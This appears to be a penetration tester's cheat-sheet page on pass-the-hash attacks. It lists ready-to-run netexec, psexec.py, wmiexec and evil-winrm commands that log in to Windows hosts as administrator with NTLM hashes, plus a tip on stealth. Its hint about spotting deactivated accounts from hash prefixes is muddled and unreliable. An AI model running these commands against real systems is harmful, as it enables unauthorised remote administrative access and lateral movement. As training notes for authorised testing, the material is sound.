Pass-the-Hash Attacks

1.0 Hints

Useless Hashes

Deactivated accounts can be identified by the first 5 characters in the hash. These are represented in the format AADBB:DCFED aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

2.0 Tools

2.1 Netexec

nxc smb $ip1 $ip2 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth

2.2 psexec.py

Hint

PSExec is not very stealth, WMIExec is the better choice

psexec.py administrator@$ip -hashes aad3b435b51404eeaad3b435b51404ee:3542d79d5d17bc9d3014d4d56b5e3060

2.3 impacket-wmiexec

impacket-wmiexec administrator@$ip -hashes aad3b435b51404eeaad3b435b51404ee:3542d79d5d17bc9d3014d4d56b5e3060

2.4 evil-winrm

evil-winrm -u administrator -H 5b38382017f8c0ac215895d5f9aacac4 -i $ip

References

juggernaut: pass-the-hash-attacks

hckhsn

Explorer

PTH - Pass-the-Hash Attacks

Pass-the-Hash Attacks

1.0 Hints

2.0 Tools

2.1 Netexec

2.2 psexec.py

2.3 impacket-wmiexec

2.4 evil-winrm

References

Graphansicht

Inhaltsverzeichnis